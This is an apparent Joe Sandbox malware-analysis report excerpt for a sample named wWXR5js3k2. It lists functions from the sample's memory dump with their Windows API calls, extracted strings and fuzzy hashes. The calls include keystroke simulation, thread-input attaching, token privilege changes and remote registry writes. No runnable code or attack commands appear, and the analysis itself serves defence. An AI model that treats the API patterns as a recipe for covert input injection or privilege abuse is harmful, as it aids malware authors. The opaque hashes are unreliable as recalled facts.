                                                    • Instruction Fuzzy Hash: 75F03071505751CFCB349F64E495856B7E2BF1432A72089BEE6D782621CB719888DF40
                                                    APIs
                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006707B0
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 8def58c31d4acd308bdf3c9ae5d42c125952040a1c8b55639211acbadb7685df
                                                    • Instruction ID: 457d93877ad780ecfbcafa18c14e80809e602588a40f91871851e8a732dfae2b
                                                    • Opcode Fuzzy Hash: 8def58c31d4acd308bdf3c9ae5d42c125952040a1c8b55639211acbadb7685df
                                                    • Instruction Fuzzy Hash: 97E0CD3690512857C720E6999C05FEA77DEDF897A1F0441F6FC0CD7244D9609D8086D4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                    • Instruction ID: 71c92081a15c223e8b41ac689c2f6b08bf67637418b1cd08650e1a53f54734a1
                                                    • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                    • Instruction Fuzzy Hash: 7DE092B0104B045FD7388A24D840BE373E6AB05304F00085DF2AA83341EBA3B882C759
                                                    APIs
                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0068DD42,?,?,00000000), ref: 00655C5F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: c6ac195b14ec81b066d1accb97d6907b0b92a6d926caa5929ca9f59192f8dab9
                                                    • Instruction ID: 62be7f704cae78d717af59a5219fc28651c71528bb53a3a82481e17ddfeb7fcd
                                                    • Opcode Fuzzy Hash: c6ac195b14ec81b066d1accb97d6907b0b92a6d926caa5929ca9f59192f8dab9
                                                    • Instruction Fuzzy Hash: B2D0C77464020CBFE710DB80DC46FA9777DD745710F100195FD0456290D6B27D508795
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: 760221b91cc9f9b0202a97603a3fea3426845fdb97a2a1db4a51474c97fc2115
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: 12B0927644020C77CE012A82EC02A493B1A9B41764F408060FB1C18162E6B3A6649A89
                                                    APIs
                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 006BD1FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: e1d3f15a1119d71fbe60f1ac46bf8fbb59bf77b9e3dc2642b7b18b551afb65a3
                                                    • Instruction ID: 0cd8d24ffd93ad1d1160ada8f18262b136ee06113c1dae18d27e1e3480a0c4fa
                                                    • Opcode Fuzzy Hash: e1d3f15a1119d71fbe60f1ac46bf8fbb59bf77b9e3dc2642b7b18b551afb65a3
                                                    • Instruction Fuzzy Hash: C3718270204341CFC754EF68C491AAAB7E2EF89314F04492DF9969B3A1DB30EE49CB56
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 2e2ccb1a9763124fc58dfdca80ab3e084dd7a8c976d75ea93164517429f9d6ac
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 2631A274A00105DBE71ADF58C484AA9FBA6FB59300B64C7A5E80ACB355D631EDC2DBA0
                                                    APIs
                                                    • Sleep.KERNELBASE(000001F4), ref: 032D22B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1379067181.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_32d0000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction ID: af5f08219b88903d9daeb51d5da6ed02c031f28f9b0afd97ff9c0b28b98fffb3
                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                    • Instruction Fuzzy Hash: DDE0E67594020EDFDB00EFB8D94D69E7FB4EF04301F1005A1FD01D2280D6309D509A72
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 006DCB37
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006DCB95
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006DCBD6
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006DCC00
                                                    • SendMessageW.USER32 ref: 006DCC29
                                                    • _wcsncpy.LIBCMT ref: 006DCC95
                                                    • GetKeyState.USER32(00000011), ref: 006DCCB6
                                                    • GetKeyState.USER32(00000009), ref: 006DCCC3
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006DCCD9
                                                    • GetKeyState.USER32(00000010), ref: 006DCCE3
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006DCD0C
                                                    • SendMessageW.USER32 ref: 006DCD33
                                                    • SendMessageW.USER32(?,00001030,?,006DB348), ref: 006DCE37
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 006DCE4D
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 006DCE60
                                                    • SetCapture.USER32(?), ref: 006DCE69
                                                    • ClientToScreen.USER32(?,?), ref: 006DCECE
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006DCEDB
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006DCEF5
                                                    • ReleaseCapture.USER32 ref: 006DCF00
                                                    • GetCursorPos.USER32(?), ref: 006DCF3A
                                                    • ScreenToClient.USER32(?,?), ref: 006DCF47
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 006DCFA3
                                                    • SendMessageW.USER32 ref: 006DCFD1
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 006DD00E
                                                    • SendMessageW.USER32 ref: 006DD03D
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006DD05E
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 006DD06D
                                                    • GetCursorPos.USER32(?), ref: 006DD08D
                                                    • ScreenToClient.USER32(?,?), ref: 006DD09A
                                                    • GetParent.USER32(?), ref: 006DD0BA
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 006DD123
                                                    • SendMessageW.USER32 ref: 006DD154
                                                    • ClientToScreen.USER32(?,?), ref: 006DD1B2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006DD1E2
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 006DD20C
                                                    • SendMessageW.USER32 ref: 006DD22F
                                                    • ClientToScreen.USER32(?,?), ref: 006DD281
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006DD2B5
                                                      • Part of subcall function 006525DB: GetWindowLongW.USER32(?,000000EB), ref: 006525EC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006DD351
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$@U=u$F$hW$pbq
                                                    • API String ID: 3977979337-816998740
                                                    • Opcode ID: 513cf09eb43c6d8b580535ba0dd5ef405c5c670e5c5cb6839769f8dd8e66ae84
                                                    • Instruction ID: 2a520e307d7ebbb46f34b50c3774618ae67cca07ad9be2e60b3f37a0db9ccb6e
                                                    • Opcode Fuzzy Hash: 513cf09eb43c6d8b580535ba0dd5ef405c5c670e5c5cb6839769f8dd8e66ae84
                                                    • Instruction Fuzzy Hash: 1942BC34A04246EFD724DF28C855EAABBE6FF49320F14452EF696873A0C731D845DB52
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_memset
                                                    • String ID: ]p$3cf$DEFINE$P\p$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_f
                                                    • API String ID: 1357608183-3667214126
                                                    • Opcode ID: 5538ba64af562bc9612e9bd93b575b419457f5e2ed16bb24b1185a8b84bb7a3c
                                                    • Instruction ID: c2c43d153684dde6909e2df395620043fd685022df39272e94024c89e5a49ab3
                                                    • Opcode Fuzzy Hash: 5538ba64af562bc9612e9bd93b575b419457f5e2ed16bb24b1185a8b84bb7a3c
                                                    • Instruction Fuzzy Hash: 62938171A40216DBDB24DF58C891BEDB7B2FF49314F24816AE945AB381E7709E82CF50
                                                    APIs
                                                    • GetForegroundWindow.USER32(00000000,?), ref: 006548DF
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0068D665
                                                    • IsIconic.USER32(?), ref: 0068D66E
                                                    • ShowWindow.USER32(?,00000009), ref: 0068D67B
                                                    • SetForegroundWindow.USER32(?), ref: 0068D685
                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0068D69B
                                                    • GetCurrentThreadId.KERNEL32 ref: 0068D6A2
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0068D6AE
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0068D6BF
                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0068D6C7
                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 0068D6CF
                                                    • SetForegroundWindow.USER32(?), ref: 0068D6D2
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068D6E7
                                                    • keybd_event.USER32(00000012,00000000), ref: 0068D6F2
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068D6FC
                                                    • keybd_event.USER32(00000012,00000000), ref: 0068D701
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068D70A
                                                    • keybd_event.USER32(00000012,00000000), ref: 0068D70F
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0068D719
                                                    • keybd_event.USER32(00000012,00000000), ref: 0068D71E
                                                    • SetForegroundWindow.USER32(?), ref: 0068D721
                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 0068D748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 4125248594-2988720461
                                                    • Opcode ID: b59e8af75762f9fe2d23fb2f4699ae4cf22372fb160a652124e8162ccad44891
                                                    • Instruction ID: 5afaa193d60d4ba910c72c86161a289cc772d62458604409269c2b787dbf4dc0
                                                    • Opcode Fuzzy Hash: b59e8af75762f9fe2d23fb2f4699ae4cf22372fb160a652124e8162ccad44891
                                                    • Instruction Fuzzy Hash: 24319371A41318BAEB202B619C49FBF3F6EEB44B50F104066FA05EA1D1CAB05941ABA0
                                                    APIs
                                                      • Part of subcall function 006A87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006A882B
                                                      • Part of subcall function 006A87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006A8858
                                                      • Part of subcall function 006A87E1: GetLastError.KERNEL32 ref: 006A8865
                                                    • _memset.LIBCMT ref: 006A8353
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006A83A5
                                                    • CloseHandle.KERNEL32(?), ref: 006A83B6
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006A83CD
                                                    • GetProcessWindowStation.USER32 ref: 006A83E6
                                                    • SetProcessWindowStation.USER32(00000000), ref: 006A83F0
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006A840A
                                                      • Part of subcall function 006A81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006A8309), ref: 006A81E0
                                                      • Part of subcall function 006A81CB: CloseHandle.KERNEL32(?,?,006A8309), ref: 006A81F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: 5a6ebe52326eae971557cdd18fb53b4369a18a30c8067e700f6d3c515f31dc40
                                                    • Instruction ID: 2022a32b1890fef311f30f57d58ee3ad8a74d9961e30bfcd064f235eb4885217
                                                    • Opcode Fuzzy Hash: 5a6ebe52326eae971557cdd18fb53b4369a18a30c8067e700f6d3c515f31dc40
                                                    • Instruction Fuzzy Hash: 528158B1D01249AFDF51AFA4CC45AEEBBBAEF05304F14816AF815A3261DB319E14DF20
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 006BC78D
                                                    • FindClose.KERNEL32(00000000), ref: 006BC7E1
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006BC806
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006BC81D
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 006BC844
                                                    • __swprintf.LIBCMT ref: 006BC890
                                                    • __swprintf.LIBCMT ref: 006BC8D3
                                                      • Part of subcall function 00657DE1: _memmove.LIBCMT ref: 00657E22
                                                    • __swprintf.LIBCMT ref: 006BC927
                                                      • Part of subcall function 00673698: __woutput_l.LIBCMT ref: 006736F1
                                                    • __swprintf.LIBCMT ref: 006BC975
                                                      • Part of subcall function 00673698: __flsbuf.LIBCMT ref: 00673713
                                                      • Part of subcall function 00673698: __flsbuf.LIBCMT ref: 0067372B
                                                    • __swprintf.LIBCMT ref: 006BC9C4
                                                    • __swprintf.LIBCMT ref: 006BCA13
                                                    • __swprintf.LIBCMT ref: 006BCA62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                    • API String ID: 3953360268-2428617273
                                                    • Opcode ID: 88a31c967b7c4051f2ff0fe57707b9adf664920d9dd994d1b4f609054d782735
                                                    • Instruction ID: 3019fd18110c981ea5d2b787ce4378574b1edd23b9c9dcdd35796b9b6455c3ef
                                                    • Opcode Fuzzy Hash: 88a31c967b7c4051f2ff0fe57707b9adf664920d9dd994d1b4f609054d782735
                                                    • Instruction Fuzzy Hash: BEA13EB1404345ABC740EFA4C886DAFB7EEBF94701F40491EF99586291EB34DA48CB66
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 006BEFB6
                                                    • _wcscmp.LIBCMT ref: 006BEFCB
                                                    • _wcscmp.LIBCMT ref: 006BEFE2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 006BEFF4
                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 006BF00E
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006BF026
                                                    • FindClose.KERNEL32(00000000), ref: 006BF031
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 006BF04D
                                                    • _wcscmp.LIBCMT ref: 006BF074
                                                    • _wcscmp.LIBCMT ref: 006BF08B
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006BF09D
                                                    • SetCurrentDirectoryW.KERNEL32(00708920), ref: 006BF0BB
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006BF0C5
                                                    • FindClose.KERNEL32(00000000), ref: 006BF0D2
                                                    • FindClose.KERNEL32(00000000), ref: 006BF0E4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                    • String ID: *.*
                                                    • API String ID: 1803514871-438819550
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D0953
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,006DF910,00000000,?,00000000,?,?), ref: 006D09C1
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006D0A09
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006D0A92
                                                    • RegCloseKey.ADVAPI32(?), ref: 006D0DB2
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 006D0DBF
                                                    Strings
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0Do$0Eo$0Fo$3cf$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGo$_f
                                                    • API String ID: 0-4072837325
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,76F88FB0,?,00000000), ref: 006BF113
                                                    • _wcscmp.LIBCMT ref: 006BF128
                                                    • _wcscmp.LIBCMT ref: 006BF13F
                                                      • Part of subcall function 006B4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006B43A0
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 006BF16E
                                                    • FindClose.KERNEL32(00000000), ref: 006BF179
                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 006BF195
                                                    • _wcscmp.LIBCMT ref: 006BF1BC
                                                    • _wcscmp.LIBCMT ref: 006BF1D3
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006BF1E5
                                                    • SetCurrentDirectoryW.KERNEL32(00708920), ref: 006BF203
                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006BF20D
                                                    • FindClose.KERNEL32(00000000), ref: 006BF21A
                                                    • FindClose.KERNEL32(00000000), ref: 006BF22C
                                                    Strings
                                                    Similarity
                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                    • String ID: *.*
                                                    • API String ID: 1824444939-438819550
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006BA20F
                                                    • __swprintf.LIBCMT ref: 006BA231
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 006BA26E
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 006BA293
                                                    • _memset.LIBCMT ref: 006BA2B2
                                                    • _wcsncpy.LIBCMT ref: 006BA2EE
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 006BA323
                                                    • CloseHandle.KERNEL32(00000000), ref: 006BA32E
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 006BA337
                                                    • CloseHandle.KERNEL32(00000000), ref: 006BA341
                                                    Strings
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 006B0097
                                                    • SetKeyboardState.USER32(?), ref: 006B0102
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 006B0122
